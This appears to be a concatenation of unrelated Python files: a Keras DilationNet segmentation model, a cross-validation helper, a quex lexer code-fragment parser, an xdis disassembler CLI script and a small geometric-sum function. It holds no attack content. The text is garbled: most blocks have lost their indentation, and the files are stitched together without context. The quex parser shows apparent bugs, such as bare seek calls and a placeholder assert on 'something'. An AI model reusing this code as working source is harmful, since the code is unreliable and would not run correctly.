h = Convolution2D(256, 3, 3, activation='relu', name='conv3_2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_3')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool3')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_1')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_2')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_3')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_1')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_2')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_3')(h)
h = AtrousConvolution2D(4096, 7, 7, atrous_rate=(4, 4), activation='relu', name='fc6')(h)
h = Dropout(0.5, name='drop6')(h)
h = Convolution2D(4096, 1, 1, activation='relu', name='fc7')(h)
h = Dropout(0.5, name='drop7')(h)
h = Convolution2D(classes, 1, 1, name='final')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_2')(h)
h = ZeroPadding2D(padding=(2, 2))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(2, 2), activation='relu', name='ctx_conv2_1')(h)
h = ZeroPadding2D(padding=(4, 4))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(4, 4), activation='relu', name='ctx_conv3_1')(h)
h = ZeroPadding2D(padding=(8, 8))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(8, 8), activation='relu', name='ctx_conv4_1')(h)
h = ZeroPadding2D(padding=(16, 16))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(16, 16), activation='relu', name='ctx_conv5_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_fc1')(h)
logits = Convolution2D(classes, 1, 1, name='ctx_final')(h)
if apply_softmax:
model_out = softmax(logits)
else:
model_out = logits
model = Model(input=model_in, output=model_out, name='dilation_camvid')
return model
# model function
def DilationNet(dataset, input_shape=None, apply_softmax=True, pretrained=True,
input_tensor=None, classes=None):
""" Instantiate the Dilation network architecture, optionally loading weights
pre-trained on a dataset in the set (cityscapes, voc12, kitti, camvid).
Note that pre-trained model is only available for Theano dim ordering.
The model and the weights should be compatible with both
TensorFlow and Theano backends.
# Arguments
dataset: choose among (cityscapes, voc12, kitti, camvid).
input_shape: shape tuple. It should have exactly 3 inputs channels,
and the axis ordering should be coherent with what specified in
your keras.json (e.g. use (3, 512, 512) for 'th' and (512, 512, 3)
for 'tf'). None will default to dataset specific sizes.
apply_softmax: whether to apply softmax or return logits.
        pretrained: boolean. If `True`, loads weights pre-trained on the
            chosen dataset (only available with Theano dim ordering).
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
classes: optional number of segmentation classes. If pretrained is True,
it should be coherent with the dataset chosen.
# Returns
A Keras model instance.
"""
if dataset not in {'cityscapes', 'voc12', 'kitti', 'camvid'}:
raise ValueError('The `dataset` argument should be one among '
'(cityscapes, voc12, kitti, camvid)')
if classes is not None:
if classes != CONFIG[dataset]['classes'] and pretrained:
raise ValueError('Cannot load pretrained model for dataset `{}` '
'with {} classes'.format(dataset, classes))
else:
classes = CONFIG[dataset]['classes']
if input_shape is None:
input_shape = CONFIG[dataset]['input_shape']
# get the model
if dataset == 'cityscapes':
model = get_dilation_model_cityscapes(input_shape=input_shape, apply_softmax=apply_softmax,
input_tensor=input_tensor, classes=classes)
elif dataset == 'voc12':
model = get_dilation_model_voc(input_shape=input_shape, apply_softmax=apply_softmax,
input_tensor=input_tensor, classes=classes)
elif dataset == 'kitti':
model = get_dilation_model_kitti(input_shape=input_shape, apply_softmax=apply_softmax,
input_tensor=input_tensor, classes=classes)
elif dataset == 'camvid':
model = get_dilation_model_camvid(input_shape=input_shape, apply_softmax=apply_softmax,
input_tensor=input_tensor, classes=classes)
# load weights
if pretrained:
if K.image_dim_ordering() == 'th':
weights_path = get_file(CONFIG[dataset]['weights_file'],
CONFIG[dataset]['weights_url'],
cache_subdir='models')
model.load_weights(weights_path)
if K.backend() == 'tensorflow':
warnings.warn('You are using the TensorFlow backend, yet you '
'are using the Theano '
'image dimension ordering convention '
'(`image_dim_ordering="th"`). '
'For best performance, set '
'`image_dim_ordering="tf"` in '
'your Keras config '
'at ~/.keras/keras.json.')
convert_all_kernels_in_model(model)
else:
raise NotImplementedError('Pretrained DilationNet model is not available with '
'tensorflow dim ordering')
return model
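if __name__ == '__main__':
    # Hedged usage sketch, not part of the original module: build one variant
    # without downloading pretrained weights. The legacy Keras 1.x API used
    # throughout this module is assumed to be installed.
    model = DilationNet('camvid', pretrained=False, apply_softmax=True)
    model.summary()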
|
from random import randrange
# Split a dataset into k folds
def cross_validation_split(dataset, n_folds):
dataset_split = list()
dataset_copy = list(dataset)
fold_size = int(len(dataset) / n_folds)
for _ in range(n_folds):
fold = list()
while len(fold) < fold_size:
index = randrange(len(dataset_copy))
fold.append(dataset_copy.pop(index))
dataset_split.append(fold)
return dataset_split
# Calculate accuracy percentage
def accuracy_metric(actual, predicted):
correct = 0
for i in range(len(actual)):
if actual[i] == predicted[i]:
correct = correct + 1
return correct / float(len(actual)) * 100
# Evaluate an algorithm using a cross validation split
def evaluate_algorithm(dataset, algorithm, n_folds, *args):
folds = cross_validation_split(dataset, n_folds)
scores = []
for fold in folds:
train_set = list(folds)
train_set.remove(fold)
train_set = sum(train_set, [])
test_set = []
for row in fold:
row_copy = list(row)
test_set.append(row_copy)
row_copy[-1] = None
predicted = algorithm(train_set, test_set, *args)
actual = [row[-1] for row in fold]
accuracy = accuracy_metric(actual, predicted)
scores.append(accuracy)
return scores
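if __name__ == '__main__':
    # Hedged usage sketch, not part of the original module: evaluate a trivial
    # zero-rule baseline (always predict the majority class of the training
    # folds) on a toy dataset of [feature, label] rows.
    def zero_rule_algorithm(train, test):
        labels = [row[-1] for row in train]
        prediction = max(set(labels), key=labels.count)
        return [prediction for _ in test]
    toy_dataset = [[i, i % 2] for i in range(20)]
    scores = evaluate_algorithm(toy_dataset, zero_rule_algorithm, 5)
    print('Scores: %s' % scores)
    print('Mean Accuracy: %.3f%%' % (sum(scores) / float(len(scores))))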
|
"""Unit test for pydrip modules."""
|
from quex.frs_py.file_in import *
import quex.lexer_mode as lexer_mode
from quex.token_id_maker import TokenInfo
from quex.input.setup import setup as Setup
from quex.input.ucs_db_parser import ucs_property_db
from quex.core_engine.utf8 import __read_one_utf8_code_from_stream
from quex.core_engine.generator.action_info import *
LanguageDB = Setup.language_db
def parse(fh, CodeFragmentName,
ErrorOnFailureF=True, AllowBriefTokenSenderF=True):
"""RETURNS: An object of class UserCodeFragment containing
line number, filename, and the code fragment.
None in case of failure.
"""
assert Setup.__class__.__name__ == "something"
assert type(ErrorOnFailureF) == bool
assert type(AllowBriefTokenSenderF) == bool
skip_whitespace(fh)
position = fh.tell()
word = fh.read(2)
if len(word) >= 1 and word[0] == "{":
fh.seek(-1, 1) # unput the second character
return __parse_normal(fh, CodeFragmentName)
elif AllowBriefTokenSenderF and word == "=>":
return __parse_brief_token_sender(fh)
elif not ErrorOnFailureF:
fh.seek(-2,1)
return None
else:
error_msg("missing code fragment after %s definition." % CodeFragmentName, fh)
def __parse_normal(fh, code_fragment_name):
line_n = get_current_line_info_number(fh) + 1
code = read_until_closing_bracket(fh, "{", "}")
return UserCodeFragment(code, fh.name, line_n, LanguageDB, AddReferenceCodeF=True)
def __parse_brief_token_sender(fh):
# shorthand for { self.send(TKN_SOMETHING); RETURN; }
position = fh.tell()
line_n = get_current_line_info_number(fh) + 1
try:
skip_whitespace(fh)
position = fh.tell()
code = __parse_token_id_specification_by_character_code(fh)
if code != "": return UserCodeFragment(code, fh.name, line_n, LanguageDB, AddReferenceCodeF=True)
identifier, arg_list_str = __parse_function_call(fh)
if identifier in ["GOTO", "GOSUB", "GOUP"]:
code = __create_mode_transition_and_token_sender(fh, identifier, arg_list_str)
else:
code = __create_token_sender_by_token_name(fh, identifier, arg_list_str)
if code != "":
return UserCodeFragment(code, fh.name, line_n, LanguageDB, AddReferenceCodeF=True)
else:
return None
except EndOfStreamException:
fh.seek(position)
error_msg("End of file reached while parsing token shortcut.", fh)
def read_character_code(fh):
    # NOTE: This function is tested with the regression test for feature request 2251359.
# See directory $QUEX_PATH/TEST/2251359.
pos = fh.tell()
start = fh.read(1)
if start == "":
        fh.seek(pos); return -1
elif start == "'":
# read an utf-8 char an get the token-id
# Example: '+'
character_code = __read_one_utf8_code_from_stream(fh)
if character_code == 0xFF:
error_msg("Missing utf8-character for definition of character code by character.", fh)
elif fh.read(1) != '\'':
error_msg("Missing closing ' for definition of character code by character.", fh)
return character_code
if start == "U":
if fh.read(1) != "C": seek(pos); return -1
# read Unicode Name
# Example: UC MATHEMATICAL_MONOSPACE_DIGIT_FIVE
skip_whitespace(fh)
ucs_name = read_identifier(fh)
if ucs_name == "": seek(pos); return -1
# Get the character set related to the given name. Note, the size of the set
# is supposed to be one.
character_code = ucs_property_db.get_character_set("Name", ucs_name)
if type(character_code) in [str, unicode]:
error_msg("%s does not identify a known unicode character." % ucs_name, fh)
if type(character_code) not in [int, long]:
error_msg("%s relates to more than one character in unicode database." % ucs_name, fh)
return character_code
second = fh.read(1)
if start == "0" and second.isdigit() == False:
base = second
if base not in ["x", "o", "b"]:
error_msg("Number base '0%s' is unknown, please use '0x' for hexidecimal,\n" % base + \
"'0o' for octal, or '0b' for binary.", fh)
number_txt = read_integer(fh)
if number_txt == "":
error_msg("Missing integer number after '0%s'" % base, fh)
try:
if base == "x": character_code = int("0x" + number_txt, 16)
elif base == "o": character_code = int(number_txt, 8)
elif base == "b":
character_code = 0
for letter in number_txt:
character_code = character_code << 1
if letter == "1": character_code += 1
elif letter != "0":
error_msg("Letter '%s' not permitted in binary number (something start with '0b')" % letter, fh)
else:
# A normal integer number (starting with '0' though)
                character_code = int(base + number_txt)
except:
error_msg("The string '%s' is not appropriate for number base '0%s'." % (number_txt, base), fh)
return character_code
elif start.isdigit():
fh.seek(-2, 1) # undo 'start' and 'second'
# All that remains is that it is a 'normal' integer
number_txt = read_integer(fh)
if number_txt == "": fh.seek(pos); return -1
try: return int(number_txt)
except: error_msg("The string '%s' is not appropriate for number base '10'." % number_txt, fh)
else:
# Try to interpret it as something else ...
fh.seek(pos); return -1
def __parse_function_call(fh):
position = fh.tell()
try:
skip_whitespace(fh)
identifier = read_identifier(fh)
skip_whitespace(fh)
tmp = fh.read(1)
if tmp not in ["(", ";"]:
error_msg("Missing '(' or ';' after '%s'." % identifier, fh)
if tmp == ";":
return identifier, "" # No argument list, ";" arrived immediately
arg_list_str = read_until_closing_bracket(fh, "(", ")")
verify_next_word(fh, ";")
return identifier, arg_list_str
except EndOfStreamException:
fh.seek(position)
error_msg("End of file reached while parsing token shortcut.", fh)
def __parse_token_id_specification_by_character_code(fh):
character_code = read_character_code(fh)
if character_code == -1: return ""
verify_next_word(fh, ";")
prefix_less_token_name = "UCS_0x%06X" % character_code
token_id_str = Setup.input_token_id_prefix + prefix_less_token_name
lexer_mode.token_id_db[prefix_less_token_name] = \
TokenInfo(prefix_less_token_name, character_code, None, fh.name, get_current_line_info_number(fh))
txt = "#ifdef QUEX_OPTION_TOKEN_SENDING_VIA_QUEUE\n"
txt += "self.send(%s); return;\n" % token_id_str
txt += "#else\n"
txt += "self.send(%s); return %s;\n" % (token_id_str, token_id_str)
txt += "#endif\n"
return txt
def __create_token_sender_by_token_name(fh, TokenName, ArgListStr):
assert type(ArgListStr) == str
# after 'send' the token queue is filled and one can safely return
if TokenName.find(Setup.input_token_id_prefix) != 0:
error_msg("token identifier does not begin with token prefix '%s'\n" % Setup.input_token_id_prefix + \
"found: '%s'" % TokenName, fh)
# occasionally add token id automatically to database
prefix_less_TokenName = TokenName[len(Setup.input_token_id_prefix):]
if not lexer_mode.token_id_db.has_key(prefix_less_TokenName):
msg = "Token id '%s' defined implicitly." % TokenName
if TokenName in lexer_mode.token_id_db.keys():
msg += "\nNOTE: '%s' has been defined in a token { ... } section!" % \
(Setup.input_token_id_prefix + TokenName)
msg += "\nNote, that tokens in the token { ... } section are automatically prefixed."
error_msg(msg, fh, DontExitF=True)
lexer_mode.token_id_db[prefix_less_TokenName] = \
TokenInfo(prefix_less_TokenName, None, None, fh.name, get_current_line_info_number(fh))
tail = ArgListStr
if tail != "": tail = ", " + tail
txt = "#ifdef QUEX_OPTION_TOKEN_SENDING_VIA_QUEUE\n"
txt += "self.send(%s%s); return;\n" % (TokenName, tail)
txt += "#else\n"
txt += "self.send(%s); return %s;\n" % (ArgListStr, TokenName)
txt += "#endif\n"
return txt
def __create_mode_transition_and_token_sender(fh, Command, ArgListStr):
assert Command in ["GOTO", "GOSUB", "GOUP"]
assert type(ArgListStr) == str
arg_list = ArgListStr.split(",")
arg_list = filter(lambda arg: arg != "", arg_list)
L = len(arg_list)
target_mode = None
token_name = None
tail = []
if Command in ["GOTO", "GOSUB"]:
if L < 1:
error_msg("The %s mode short cut requires at least one argument: The target mode." % Command, fh)
target_mode = arg_list[0]
if L > 1: token_name = arg_list[1]
if L > 2: tail = arg_list[2:]
else: # Command == "GOUP"
if L > 0: token_name = arg_list[0]
if L > 1: tail = arg_list[1:]
mode_change_str = { "GOTO": lambda Mode: "self << " + Mode + ";\n",
"GOSUB": lambda Mode: "self.push_mode(" + Mode + ");\n",
"GOUP": lambda Mode: "self.pop_mode();\n"
}[Command](target_mode)
tail_str = ""
for element in tail:
tail_str += ", " + element
if token_name != None: send_str = "self.send(%s%s); "% (token_name, tail_str)
else: send_str = ""
txt = mode_change_str
txt += "#ifdef QUEX_OPTION_TOKEN_SENDING_VIA_QUEUE\n"
txt += send_str + "return;\n"
txt += "#else\n"
txt += send_str + "return %s;\n" % token_name
txt += "#endif\n"
return txt
|
# Mode: -*- python -*-
# Copyright (c) 2015-2019 by Rocky Bernstein <rb@dustyfeet.com>
#
# Note: we can't start with #! because setup.py bdist_wheel will look for that
# and change that into something that's not portable. Thank you, Python!
#
#
from __future__ import print_function
import sys, os
import click
import os.path as osp
from xdis.version import VERSION
from xdis import PYTHON_VERSION
from xdis.main import disassemble_file
program, ext = os.path.splitext(os.path.basename(__file__))
PATTERNS = ('*.pyc', '*.pyo')
@click.command()
@click.option("--asm/--noasm", default=False,
help='Produce output suitable for the xasm assembler')
@click.option("--show-bytes/--noshow-bytes", default=False,
help='include bytecode bytes in output')
@click.version_option(version=VERSION)
@click.option("--header/--no-header", default=False,
help='Show only the module header information')
@click.argument('files', nargs=-1, type=click.Path(readable=True), required=True)
def main(asm, show_bytes, header, files):
"""Disassembles a Python bytecode file.
We handle bytecode for virtually every release of Python and some releases of PyPy.
The version of Python in the bytecode doesn't have to be the same version as
the Python interpreter used to run this program. For example, you can disassemble Python 3.6.1
bytecode from Python 2.7.13 and vice versa.
"""
Usage_short = """usage:
%s [--asm] -i FILE...
%s --version
Type -h for for full help.""" % (program, program)
if not (2.5 <= PYTHON_VERSION <= 3.8):
        print("This works on Python version 2.5..3.8; have %s" % PYTHON_VERSION, file=sys.stderr)
if not len(files):
sys.stderr.write("No file(s) given..\n")
print(Usage_short, file=sys.stderr)
sys.exit(1)
for path in files:
# Some sanity checks
if not osp.exists(path):
sys.stderr.write("File name: '%s' doesn't exist\n" % path)
continue
elif not osp.isfile(path):
sys.stderr.write("File name: '%s' isn't a file\n" % path)
continue
elif osp.getsize(path) < 50:
sys.stderr.write("File name: '%s (%d bytes)' is too short to be a valid pyc file\n" % (path, osp.getsize(path)))
continue
disassemble_file(path, sys.stdout, asm, header, show_bytes)
return
if __name__ == '__main__':
main(sys.argv[1:])
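# Hedged example invocation (the installed script name and the file path are
# assumptions, not from the original source):
#
#   $ pydisasm --asm --show-bytes path/to/module.cpython-37.pyc
#
# Programmatic use would mirror the call made inside main() above:
#
#   from xdis.main import disassemble_file
#   disassemble_file("path/to/module.cpython-37.pyc", sys.stdout, False, False, False)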
|
def n_last_char(a, b, n):
    # Return the last n digits (zero-padded) of the geometric sum
    # 1 + a + a**2 + ... + a**b = (a**(b + 1) - 1) // (a - 1).
    if a == 1:
        s = b + 1
    else:
        s = (pow(a, b + 1) - 1) // (a - 1)
    s %= pow(10, n)
    res = str(s)
    while len(res) < n:
        res = '0' + res
    return res
# print(n_last_char(1,1,4))
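# Worked example (illustrative, not in the original): for a=2, b=3 the sum is
# 1 + 2 + 4 + 8 = 15, so the last four digits, zero-padded, are "0015".
assert n_last_char(2, 3, 4) == "0015"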
|